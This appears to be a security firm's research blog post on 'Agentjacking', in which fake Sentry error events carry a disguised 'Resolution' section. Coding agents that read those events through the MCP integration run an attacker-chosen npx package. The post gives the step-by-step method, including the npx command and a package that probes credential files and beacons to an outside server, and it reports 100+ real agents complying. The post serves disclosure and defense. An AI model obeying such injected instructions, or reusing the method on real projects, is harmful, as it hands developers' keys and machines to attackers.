One Fake Bug Report Hijacked a $250B Company’s AI Agent

17 min read Original article ↗

Interested to learn more? Register to our webinar: Agentjacking | A Live Walkthrough & Defenses by Tenet Threat Labs

Tenet Threat Labs has demonstrated a new class of attack “Agentjacking” that hijacks AI coding agents into running attacker-controlled code on a developer’s machine, triggered by a single fake error report and invisible to every security control. Using only public Sentry APIs, breaching nothing, we found 2,388 organizations exposed, saw 100+ agents act on injected errors in controlled testing, with confirmed agent execution at organizations spanning from Fortune 500 enterprises, including Fortune 100, down to independent developers.

What’s New?

  •  We’re open-sourcing “agent-jackstop” to harden coding agents against these attack types – drop-in configs that harden Cursor and Claude Code against this attack class and cut the risk from untrusted telemetry and log ingestion. View the repo.
  • A Fortune 100 company’s coding agents were taken over – a $250B enterprise whose agent executed our code in testing, alongside 100+ others.
  • New evidence pack – the attack, caught happening across 100+ agents – Almost every agent, in almost every environment, fell for it and hijacked by poisoned telemetry: Cursor and Codex, sandboxed agents, internal-network agents, even ones holding live AWS keys, across macOS, Windows and cloud. 
  • New video PoC – Cursor, fresh install, default settings. No jailbreak, no config changes, nobody types “run this.” We ask it to triage a bug –  and watch it execute attacker code on the machine. The default is the exploit.  ▶ Watch the RCE.

“Your telemetry is now an RCE vector”

Executive Summary

  • New research by Tenet Security’s Threat Labs demonstrates how a single injected error event requiring no authentication beyond a public credential found in any website’s source code can hijack AI coding agents into executing arbitrary code on developer machines.
  • The attack exploits a critical architectural flaw at the intersection of Sentry’s event ingestion (which accepts arbitrary payloads from anyone with the DSN) and the Sentry MCP server (which returns this data to AI agents as trusted system output).
    • By injecting crafted input into Sentry error events, an attacker creates instructions that are visually and structurally indistinguishable from Sentry’s own remediation guidance. 
    • AI coding agents including Claude Code and Cursor interpret these as legitimate ‘diagnostic resolution steps’ and execute attacker-controlled npm packages.
  • The impact: a single injected error puts environment variables (AWS keys, GitHub tokens, Sentry auth tokens), git credentials, private repository URLs, and developer identity within an attacker’s reach – silently exfiltrated to their server, with no credential phishing, no prior server compromise, and no user interaction beyond the developer’s normal workflow.
    • No credential phishing, no server prior compromise, no user interaction beyond the developer’s normal workflow of asking their AI agent to investigate Sentry errors.

Why It Matters

As enterprises race to deploy AI coding agents, this research proves the agents themselves are now the attack surface – turned against the developers who trust them, using nothing but data those organizations publish about themselves. The innovation is not a novel exploit: it is how trivially and at what scale agents can be hijacked in the wild. The only place left to catch it is at the agent’s runtime.

AI Coding Agents: A Powerful Assistant with a Hidden Flaw

Modern AI coding agents like Claude Code and Cursor have evolved from simple autocomplete tools into powerful assistants that can read files, execute terminal commands, query external tools, and make code changes. Through the Model Context Protocol (MCP), these agents connect to external services – including Sentry for error monitoring – and treat the data returned as authoritative system output.

The danger lies in this implicit trust. When an AI agent queries Sentry for unresolved errors, it receives the response and acts on it – just as a developer would. But unlike a developer, the agent cannot verify whether an error event was generated by a real application crash or injected by an attacker. The agent’s trust in MCP tool responses creates a direct pathway from injected data to code execution.

The Flaw

AI coding agents cannot tell the difference between the data they read and an instruction to act. Plant a command somewhere an agent will read it – even somewhere no human would ever look for one, like an error log – and the agent may simply execute it. This is a limitation of the models themselves, not a misconfiguration that can be patched away.

Figure 1 – The Agentjacking chain. Every step is authorized, which is why no security control sees it.

The Anatomy of the Attack: From Injected Error to RCE

The attack is alarmingly simple for the attacker but devastating for the target, it begins with one crafted error event, POSTed to Sentry using a public DSN – a credential that, by design, sits in the JavaScript source of countless production websites. No breach. No stolen credentials. No exploit in the traditional sense. The attacker never touches the victim’s infrastructure.

The malicious instruction arrives disguised as a legitimate “Resolution” inside an ordinary error. When a developer asks their AI agent to fix the Sentry issue, the agent reads the attacker’s command as trusted guidance and runs it – with the developer’s own privileges, on the developer’s own machine.

How the attack looks:

A detailed walkthrough of the attack:

Step 1: Find the target’s Sentry DSN – a public, write-only credential that Sentry intentionally documents as safe to embed in frontend JavaScript. Discovery methods include: inspecting any website’s JavaScript source, Censys searches for ingest.sentry.io in HTTP bodies, or GitHub code search.

Step 2: Regular event creation: POSTing a crafted error event to Sentry’s ingest endpoint. No authentication beyond the DSN is required. The attacker controls the entire event payload: error message, tags, context keys, extra data, breadcrumbs, user, stack traces, and fingerprint. Sentry accepts it (HTTP 200) and processes it identically to a legitimate application error.

Step 3: Markdown Injection: The injected event contains carefully formatted markdown in the message field and context key names. When the Sentry MCP server returns this event to an AI agent, the markdown renders as structured content: headings, code blocks, and tables that are visually identical to Sentry’s own system template. The injected content includes a fake ‘## Resolution’ section with an npx command.

Step 4: Agent Manipulation: When a developer asks their AI agent to ‘fix unresolved Sentry issues,’ (or any other related prompt) the agent queries Sentry via MCP and receives the injected event. The agent is carefully steered away from investigating source code and toward executing the suggested diagnostic tool. The agent cannot distinguish this from legitimate guidance.

Step 5: Code Execution: The agent executes: npx @tenet-controlled-validation-package –diagnose. The package downloads from the public npm registry and runs with the developer’s full privileges. The package contains a message clarifying the controlled test is running by Tenet Security with header: “X-Tenet-Security” and with the value “ResponsibleDisclosure [SECURITY SCAN]”. Reaching out to a beacon to advisory-tracker.com. A Responsible disclosure message is attached to the beacon as well.

Step 6: The package confirms that environment variables exist, file sizes of ~/.aws/config, ~/.npmrc, ~/.docker/config.json are probed, and network interfaces (VPN detection). Validation Of Exposure Data is sent via two sequential POST requests to Tenet beacon server, while disclosing to companies the relevant information (no information was ever kept or saved; all probe data was deleted and removed to adhere to best practices and make sure the organizations secure themselves correspondingly with Sentry security team as well).

One. Then ten. Then a giant.

Testing it, We’ve seen the first agent ran our code. We watched it “phone home”. Then it kept happening – ten companies, then dozens, then more than 100 around the world. 

Their AI agents were quietly running our test code, none of them aware anything was wrong.

And then we saw where one of them was: The machine belonged to a developer inside a $250 billion, Fortune 100 technology company – one of the biggest tech companies on earth. Their AI agent had read our fake bug report and run our code, just like all the others. (We’re keeping their name to ourselves – for their sake)

It didn’t stop at one giant. The companies we reached ranged from that quarter-trillion-dollar enterprise all the way down to solo developers working alone – across finance, healthcare, government, education and critical infrastructure, in more than 30 countries. Even one cloud security company was among them.

Figure 2 – Confirmed and exposed organizations span six continents. Each marker is a distinct organization reached in the campaign.

A New Approach: Attacking Through Trusted Developer Tools and Telemetry Logs

What makes this attack unique is that it doesn’t target the developer directly – it targets the AI agent that the developer trusts. Several factors make this particularly dangerous:

  • No phishing required: The attacker never interacts with the developer. The attack flows through the developer’s normal workflow of asking their AI agent to investigate Sentry errors.
  • Public credential as entry point: Sentry’s DSN is intentionally public and embedded in frontend JavaScript. This design decision – safe in a pre-AI-agent world – becomes catastrophic when injected events are returned to AI agents as trusted output.
  • Indistinguishable from legitimate guidance: The markdown injection creates content that is structurally identical to Sentry’s own MCP system template. No visual or structural indicator distinguishes attacker content from real Sentry guidance.
  • Scales effortlessly: Once a payload is crafted, it can be injected into thousands of Sentry projects simultaneously. We demonstrated this by targeting 100+ organizations in a controlled campaign.

How This Is Different From Ordinary Prompt Injection

Prompt injection, as most people picture it, happens in the chat box – in front of the user, while they work. This is something else:

  •  It arrives through your trusted telemetry data – It arrives as routine error data through a telemetry service the company already trusts.
  • There’s no jailbreak and no “run this” A plain triage request is the entire trigger – the developer never authorizes any code.
  • Every step is authorized, so no security layer fires even in most protected enterprises. Classic injection often trips an anomaly somewhere, here there is no rule broken to catch.
  • It reaches agents inside internal environments & networks by riding data from an external service: external service → trusted ingestion → code execution on an internal machine.
  • You can’t patch it with a “don’t trust what you read” instruction – we tried, and the agents ran the code anyway.

Proof: A Controlled, Real-World Validation (Updated: June 17th)

  • A Fortune 100 company’s coding agents were taken over – a $250B enterprise whose agent executed our code in testing, alongside 100+ others.
  • 4+ families of AI agents: all hijacked. even sandboxed, cloud, GCE containers, WSL – nothing saved them. Each one held some keys: AWS, GitHub OAuth, internal cloud hostnames and service creds, all reachable from one foothold. under the radar of existing security tools.
  • To prove this wasn’t theoretical, our team validated the attack end-to-end in controlled conditions and confirmed exploitability against real-world targets.
  • 2,388 organizations found exposed with valid injectable DSNs – via passive reconnaissance (Censys indexing, code search, CDN loader extraction). 71 rank in the Tranco top-1M.
  • Across controlled validation waves 100+ AI coding acted on the injected errors – including Claude Code, Cursor and Codex – an 85% exploitation success rate against injected errors, across the most widely-used agents on the market.
  • More than 100+ confirmed instances of agent execution across many organizations, documented in full – spanning a Fortune 500 enterprise ($200Bn+), a $2B+ hosting infrastructure provider, a scientific computing firm, a web startup, and multiple other development teams.
  • 2,221 exposed organizations were not included in the validation set. The same conditions exist in thousands of projects, reachable with minimal resources.
  • Full capture logs, requests sent to Sentry ingest endpoints, and timestamped proof-of-access telemetry confirming the existence and reachability of sensitive material (environment variables, AWS credentials, Kubernetes tokens, GitHub OAuth tokens, git repository URLs) – recording that these were present and exposed.

Redacted Evidence – Captured in the Wild

The Evidence, Capture by Capture

E1 – Cursor Agent in sandbox & Warp CLI Agent

A Cursor agent (Warp terminal) executed the payload and beaconed back. The capture shows the network-interface block and the Sentry ingest path that delivered our payload.

Network interface address and the project identifier are redacted. 

E2 – AI agents inside WSL on a Windows machine

Proof that agents running inside WSL (Ubuntu 20.04) on managed Windows machines were reached. The Windows logon server and the SSH agent socket were present in the environment.

Logon server and Windows username redacted. The SSH agent socket path is shown – it is not itself a secret, but its presence means the agent could reach the developer’s SSH identity.

E3 – Claude Code on macOS (with access to other agents & keys)

This is the one that shows reach. A live AWS secret access key was present in the agent’s own environment. We have blacked out the value and kept only the label — proof it was there, with nothing exposed. The same machine ran several Claude Code agent instances and held identifiers for connected downstream agents.

labels and agent version strings kept. “Connected to other agents” here means the blast radius extends beyond this host – the environment held credentials to other agents and services – not that one agent infected another.

E4 – A Sandboxed OpenAI Codex agent in CI/CD

An OpenAI Codex agent running in a CI pipeline (CircleCI) on an EC2 container — note CODEX_SANDBOX_NETWORK_DISABLED. Even a sandboxed, network-restricted CI agent was reached.

EC2 internal hostname and container names redacted. The AWS region is not sensitive and is left visible.

E5 – An OpenAI agent running as a VS Code extension

Proof that agents embedded as IDE extensions, not just standalone CLIs, fell for it too — here the OpenAI ChatGPT/Codex VS Code extension on macOS.

E6 – AI Agents Accessible to Internal Network (Behind VPNs):

Every value below is redacted at the pixel level. No real credential, identity, or host appears here.

The agent transmitted metadata, demonstrating that live cloud and cluster credentials are within reach.

What This Proves

  •  Breadth: Four-plus AI agents families, across macOS, WSL, Windows, Containers, CI, and cloud (GCP and AWS). Different operating systems and runtimes – not one lucky setup.
  • Blast radius: Live AWS keys, GitHub OAuth tokens, SSH agent sockets, and connected downstream agents were all sitting in the environments we reached — one foothold, far more than one machine’s worth of access.
  • Recency: Claude Code 2-1-161 latest, captured June 2, 2026 – a current, shipping version, not a stale lab result.
  • “Sandboxed” didn’t save them: Network-restricted CI agents were reached anyway, because the payload rode in through data the agent was asked to read. They had extensive keys, eg github tokens, otherwise they couldn’t be useful for CI purpose.

Whose Agent Got Hijacked – Sample (Redacted)

SectorSizeProven Accessible
Enterprise software & cloud (Fortune 500)~$250B parentClaude Code on two corporate Windows devices
confirmed existing: Cloud infra tokens, git tokens, etc.
Scientific / software~$20MPrivate repo, corporate VPN, confirmed existing: Cloud/GitHub/Artifactory creds
Hosting infrastructure~$2BPrivate repo, corporate email, npm / git / GitHub creds
Property-data managementprivateOrg git credentials
Web-application startupearly-stageOne organization device, CI/CD with access to production env
Digital Marketing FirmstartupDev machine – git, IDE
EdTech / HealthTech / FinTechstartupsBackend dev environments + credentials file confirmed to exist

The range ran from a ~$250B technology giant to independent solo developers – and even a cloud security vendor was among the exposed. No size, sector, or security budget predicted safety.

The Technique, Briefly

The payload is just text appended inside a bug report, formatted to look exactly like a legitimate “suggested fix.” Because it mirrors the format of the real tool output the agent already handles in this flow, the agent can’t separate the instruction from the data. There’s no exotic encoding – it reads like a normal “here’s how to fix it” resolution.

Our crafted report – formatted to look like an ordinary resolution. The agent is easily “phished”.

A New Era of Threat: Why This Changes AI Agent Security

This discovery is more than just another vulnerability – it represents a fundamental shift in the software development attack surface.

For years, supply chain attacks focused on compromising real packages (SolarWinds, CodeCov) or tricking developers with typosquatting. But with AI coding agents, attackers no longer need to compromise a package or trick a human – they just need to inject data that the AI agent trusts. The observability platform becomes a command-and-control channel, and the AI agent becomes the execution engine.

In an enterprise environment, a single injected error could allow an attacker to: steal CI/CD pipeline credentials, access private source code repositories, compromise cloud infrastructure, and establish persistent access – all without any direct interaction with the target developer.

The risk is not limited to Sentry. Any MCP tool integration that returns externally-influenced data to AI agents creates the same vulnerability class. As the AI agent ecosystem expands and more tools connect via MCP, the attack surface grows exponentially.

Systemic, Undetectable, Not a One-Vendor Bug

  • It worked across every agent tested – the most widely-used AI coding assistants on the market – because the weakness is in how agents handle tool output, not a flaw in any single product. Sentry’s MCP integration is the demonstrated entry point; the underlying problem is shared across the ecosystem.
  • Prompt-layer defenses failed. Agents executed the payload even when explicitly instructed – through detailed system prompts and skills – to ignore untrusted data. You cannot fix this with a better prompt.
  • The attack bypasses EDR, WAF, IAM, VPN, Cloudflare, and firewalls – because there is nothing malicious to detect. Every action in the chain is authorized. Tenet calls this the Authorized Intent Chain: the prevailing security model is built to catch unauthorized behavior, and this attack contains none.

How We Did This Responsibly

  • Only public Sentry ingest APIs were used. No system was breached, no authentication was bypassed, and no vulnerability was exploited in Sentry itself – the entry point is a credential Sentry intends to be public.
  • Every payload self-identified as a Tenet security scan – a custom x-tenet-security: ResponsibleDisclosure [SECURITY SCAN] header plus a benign user agent – proof we never intended to take over or weaponize any agent, only to demonstrate exposure.
  • Nothing was weaponized, no systems were put at persistent risk. Captured material was redacted at the source; victims saw only harmless diagnostic output. Validation against real-world targets was performed only to the minimum extent needed to confirm exploitability.

Vendor Response

Disclosed to Sentry on June 3, 2026 as soon as the chain was confirmed. Sentry’s leadership responded the same day – acknowledging the issue but declining to fix it at the root, calling it “technically not defensible” and noting that model vendors run middleware against it. During the research period, Sentry activated a global content filter blocking a specific payload string – detecting the activity without addressing the cause.

Tenet’s view: if the platform owner considers this class of attack “not technically defensible” at the source, the only place left to stop it is at the agent’s runtime – in the moment it decides to act.

Conclusion: Securing the AI Agent Ecosystem

Tenet Security’s findings reveal that while AI coding agents are transforming software development, their implicit trust in MCP tool responses creates a critical new attack surface. The convenience of an AI assistant connected to your observability platform comes with the risk of that assistant being weaponized against you.

Security leaders must recognize that MCP integrations are the next frontier for software supply chain attacks. It is crucial to begin evaluating: which tools your AI agents connect to, whether those tools return untrusted data, and what controls exist to prevent injected data from triggering code execution. The era of indirect prompt injection via developer tools has arrived.

Want a walkthrough of what this looks like in your environment? Contact us